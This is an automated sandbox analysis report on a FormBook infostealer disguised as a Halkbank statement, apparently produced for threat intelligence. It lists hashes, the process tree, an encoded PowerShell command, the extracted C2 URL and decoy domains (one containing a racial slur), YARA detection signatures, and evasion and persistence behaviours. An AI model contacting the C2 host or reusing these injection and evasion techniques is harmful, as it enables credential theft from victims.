Edit tour

Windows Analysis Report
Halkbank_Ekstre_20220128_081138_756957 (1).exe

Overview

General Information

Sample Name:	Halkbank_Ekstre_20220128_081138_756957 (1).exe
Analysis ID:	562454
MD5:	749aaf49615aa07edc9755541b213a4a
SHA1:	8e856cae4e8d14c7d37f5d8342fc2d30acfede64
SHA256:	d47bd2ff5d90d64d18485203e59a952e485a39f98e3d54258a578b13d9136ae7
Tags:	exeFormbookgeoHalkbankTUR
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus detection for URL or domain

Yara detected Costura Assembly Loader

Encrypted powershell cmdline option found

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Tries to detect virtualization through RDTSC time measurements

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion NT Autorun Keys Modification

PE file contains strange resources

Drops PE files

Binary contains a suspicious time stamp

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sigma detected: Suspicious Execution of Powershell with Base64

Creates a process in suspended mode (likely to inject code)

Sigma detected: Autorun Keys Modification

Classification

Process Tree

System is w10x64

Halkbank_Ekstre_20220128_081138_756957 (1).exe (PID: 3496 cmdline: "C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe" MD5: 749AAF49615AA07EDC9755541B213A4A)

powershell.exe (PID: 4744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Halkbank_Ekstre_20220128_081138_756957 (1).exe (PID: 2328 cmdline: C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe MD5: 749AAF49615AA07EDC9755541B213A4A)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.healthonline.store/po6r/"], "decoy": ["jnhuichuangxin.com", "mubashir.art", "extol.design", "doyyindh.xyz", "milanoautoexperts.com", "4thefringe.com", "453511.com", "sellathonautocredit.com", "velgian.com", "6672pk.com", "wodeluzhou.com", "sumiyoshiku-hizaita.xyz", "imoveldeprimeira.com", "dgjssp.com", "endokc.com", "side-clicks.com", "cashndashfinancial.com", "vanhemelryck.info", "agamitrading.com", "woofgang.xyz", "atnetworkinc.com", "malleshtekumatla.com", "com-home.xyz", "buildyourmtg.com", "viairazur.xyz", "drproteaches.com", "amaznsavings.com", "karencharlestonrealtor.com", "bootstrategy.com", "mimtgexpert.com", "sebzvault.com", "brtaclub.com", "gicarellc.com", "annehonorato.com", "rafalgar.com", "bergenyouthorchestra.com", "entrevistasesenciales.com", "thekneedoctors.com", "grosseilemireal.estate", "celestialdrone.art", "bouwdrogerhurenvlaanderen.com", "koppakart.com", "irishykater.quest", "blinglj.com", "editorparmindersingh.com", "klnhanced.quest", "divinebehaviorsolutions.com", "amprope.com", "futuracart.com", "ditrhub.com", "eaoeducationprogramme.com", "smartplumbing.services", "revelandlaceevents.com", "bikedh.xyz", "pacificdevelopmentstudio.com", "palisadesskivacation.com", "happy-pets.xyz", "killyourselfnigger.com", "sonicdrillinginstitute.com", "alibabascientific.com", "sh-leming.com", "aseelrealestate.com", "lohmueller.gmbh", "ngoccompany.com"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Halkbank_Ekstre_20220128_081138_756957 (1).exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\verify.exe	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000000.929078210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x27470:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2780a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3351d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x33009:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3361f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x33797:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x28222:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x32284:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x28f9a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x38a0f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x39ac2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.933873934.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x35941:$sqlite3step: 68 34 1C 7B E1 0x35a54:$sqlite3step: 68 34 1C 7B E1 0x35970:$sqlite3text: 68 38 2A 90 C5 0x35a95:$sqlite3text: 68 38 2A 90 C5 0x35983:$sqlite3blob: 68 53 D8 7F 8C 0x35aab:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9058:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x93f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14bf1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1537f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9e0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13e6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xab82:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a5f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.934742685.0000000003E87000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17529:$sqlite3step: 68 34 1C 7B E1 0x1763c:$sqlite3step: 68 34 1C 7B E1 0x17558:$sqlite3text: 68 38 2A 90 C5 0x1767d:$sqlite3text: 68 38 2A 90 C5 0x1756b:$sqlite3blob: 68 53 D8 7F 8C 0x17693:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7b18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7eb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13bc5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x136b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13cc7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13e3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x88ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1292c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9642:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x190b7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a16a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.932614500.0000000003A69000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15fe9:$sqlite3step: 68 34 1C 7B E1 0x160fc:$sqlite3step: 68 34 1C 7B E1 0x16018:$sqlite3text: 68 38 2A 90 C5 0x1613d:$sqlite3text: 68 38 2A 90 C5 0x1602b:$sqlite3blob: 68 53 D8 7F 8C 0x16153:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.935785039.00000000010D0000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.931638980.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000000.929441630.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9038:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x93d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x150e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14bd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x151e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1535f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9dea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13e4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xab62:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a5d7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b68a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.934643233.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17509:$sqlite3step: 68 34 1C 7B E1 0x1761c:$sqlite3step: 68 34 1C 7B E1 0x17538:$sqlite3text: 68 38 2A 90 C5 0x1765d:$sqlite3text: 68 38 2A 90 C5 0x1754b:$sqlite3blob: 68 53 D8 7F 8C 0x17673:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.935355147.0000000005E30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Halkbank_Ekstre_20220128_081138_756957 (1).exe PID: 3496	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 4744	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x363f4:$sa1: -enc 0x369c6:$sa1: -enc 0x36c53:$sa1: -enc 0x470ed:$sa1: -enc 0x47637:$sa1: -enc 0x47834:$sa1: -enc 0x47fdc:$sa1: -enc 0x48218:$sa1: -enc 0x8098f:$sa1: -enc 0x80d6d:$sa1: -enc 0x81b68:$sa1: -enc 0x827e2:$sa1: -enc 0x82a46:$sa1: -enc 0x84cf6:$sa1: -enc 0x852b0:$sa1: -enc 0xbede9:$sa1: -enc 0xbf033:$sa1: -enc 0xbf296:$sa1: -enc 0xcba4b:$sa1: -enc 0xe5313:$sa1: -enc 0xe7986:$sa1: -enc
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.750000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.9.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.750000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.7.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.5e30000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.Halkbank_Ekstre_20220128_081138_756957 (1).exe.3af0730.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.5.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.3.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.b50000.2.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x113d:$x1: https://cdn.discordapp.com/attachments/
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
17.0.Halkbank_Ekstre_20220128_081138_756957 (1).exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
